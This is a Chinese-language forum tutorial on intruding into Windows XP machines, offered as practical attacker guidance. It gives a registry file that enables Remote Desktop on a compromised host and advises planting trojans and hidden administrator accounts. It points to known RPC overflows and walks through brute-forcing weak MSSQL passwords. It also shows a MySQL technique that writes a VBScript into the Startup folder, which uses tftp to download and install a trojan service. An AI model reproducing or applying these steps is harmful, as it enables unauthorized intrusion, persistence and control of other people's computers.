XP入侵方法大汇总

最近有好多人都在问如何入侵XP。而且还都在用入侵2000的老方法对付XP。这是行不通的。我做了一个总结，看看可以使你对XP有一个清醒的认识，并从中找出一些入侵XP的好的方法。

入侵xp一向来都是很困难，但并不是不能入侵。 只是xp的安全性相对于windows其它糸列好些罢了，下面是xp的一些特点:

第一：xp的ipcMMc 添加管理单元去修改，充许任何用户权限登陆，但需桌面交互，和获得管理员权限. (这就是为什么要开3389的原因)

第二：xp糸统不支持多用户同时登陆，同一时间只能充许一个用户连接和登陆，建义使用 system权限进入xp主机(也就是用溢出，溢出成功后都直接进入system32目录，或种植木马)，所以通过各种 方法入侵xp主机后的第一步并不是添加一个用户名，而是上传一个木马程序更为实际. 因为在没有开启终端或仿真终端的情况下，就算你拥有一台xp主机的用户和密码， 也没什么用。

第三：现在来说说XP的远程终端连接。xp自带的远桌面连接(3389终端)，安装时默认已经安装和启动，你只要打开电脑属性但要远程连接，还 需要更改一下设置，最简单的方法远程修改注册表(这种方法好处在于不用桌面交互)，当 然你也可以用slave等远程桌面管理软件来开启，但是这样容易暴露，你的一举一动都

会在桌面有显示.下面给出注册表修改方法:

新建一注册表文件，内容为:

regedit4 (一定要大写)

[hkey_local_machine＼system＼currentcontrolset＼control＼terminal serve]

"fdenytsconnections"=dword:00000000

假如把上面的注册表文件存为3389.reg，把3389.reg上传到肉机执行regedit /s 3389.reg

这样就可以远程连接了。

XP入侵方法本地安全策略

第四：如果你想像2000那样映射XP的共享硬盘，要通过修改对方的本地安全策略。在【可匿名访问的工享】中添加上c$..等。

第五：xp中的仿真终端服务启动后默认为ntlm验证，可以用xp自带的tlntadmn(net start 只能在本地启动仿真终端服务)命令开启远程主机的telnet，而shutdown命令可以关闭远程主机，sc命令也以配置远程服务......，这些是xp自带的小工具。

第六：另外XP自带的自动更新和防火墙也为XP增强了一些安全保护。

好了，XP的一些特点介绍完了。现在总结一些入侵XP的具体办法。

首先我现总结一下我得入侵体会。

第一：由于XP不支持管理员权限IPC

第二：入侵系统后建立帐户时，不但要把它加入ADMINISTRATORS组，还要把它加入GUESTS组。因为XP的许多限制默认都是都是guest权限的，把它加入了管理员组，无形之中就使这些连接具有了admin权限。切记只是突破XP各种限制的突破口。

第三：在后门的选择上，可以多考虑一下3389。这可是2000所没有的。你用工具开他的远程桌面连接，既省掉了木马被杀的风险，而且可以完全控制对方计算机。第四：好好利用XP的【本地全策略】，其实XP的好多限制都来自这里，包括用户和远程访问的限制。你一但同过3389远程登陆到对方主机，首先就要更改它的设置。下面举几个实例：

【本地安全策略】－【用户权利指派】－【从网络访问此计算机】中入"guest"用户。这样你就能在本地【运行】中输入ip 浏览对方共享目录了。

【本地安全策略】－【用户权利指派】－【拒绝从网络访问此计算机】中删除"guest"用户。

还有很多方法可以为自己提高权限，通过注册表等等。就看你如何利用了。这里就不多说了

XP接着介绍一些入侵XP的方法

当然溢出还是绝对的主角，他的好处是可以得到"cmdshell"。缺点就是成功率不太高，要有耐心。

对没打补丁的XPSP1来说MS04011，MS03049漏洞还是很多的(ms05039主要这对的是2000)。直接溢出，不用在本地开端口，溢出成功后用telnet直接登陆就行了。

还有就是扫描135端口，看有没有rpc溢出，这是比较流行的。工具网上又很多自己去搜吧。

最后是利用数据库入侵。经典的是mysql和mssql。前者我没试过所以找了些资料大家看看吧：

mysql入侵

工具：WinEggDropShell

[1]用mysql连接你拥有用户名和密码的远程mysql数库。

[2]新建一个数据表后，安格式把下面两行语句写到新建的数据表中假如你新建的数据表为aa，

(1)insert into aa values ("set wshshell=createobject (""wscript.shell"")");

(2)insert into aa values ("a=wshshell.run (""cmd.exe /c (tftp -i 127.0.0.1get win135.exe c:＼＼windows＼＼system32＼＼win135.exe && c:＼＼windows＼＼system32＼＼win135.exe -install) && (net start win135)""，0)");

[3]把新建的数据表为脚本文件并导出到启动项:

select * from aa into outfile "c:＼＼docume~1＼＼alluse~1＼＼「开始」菜单＼＼程序＼＼启动＼＼aa.vbs";

[4]保存成功后，只要对方重启你就可以用木马登陆了

mssql，呵呵不多说了相信大家都听说过了：

首先扫描1433端口开放的主机，然后用x-scan中扫描mssql弱口令 。 再用sqlexec连接带有弱口令的主机 ，接着用tftp上传木马 ，用木马的system权限登陆后，再上传3389.reg开他的远程终端。用3389登陆后.别忘了册掉新建的用户，因为xp登陆对话框中会把新建的用户显示出来.除非你是用的内置帐户，或克隆的内置账户。

欢迎访问最专业的网吧论坛,无盘论坛,网吧经营,网咖管理,网吧专业论坛https://bbs.txwb.com

关注天下网吧微信,了解网吧网咖经营管理，安装维护: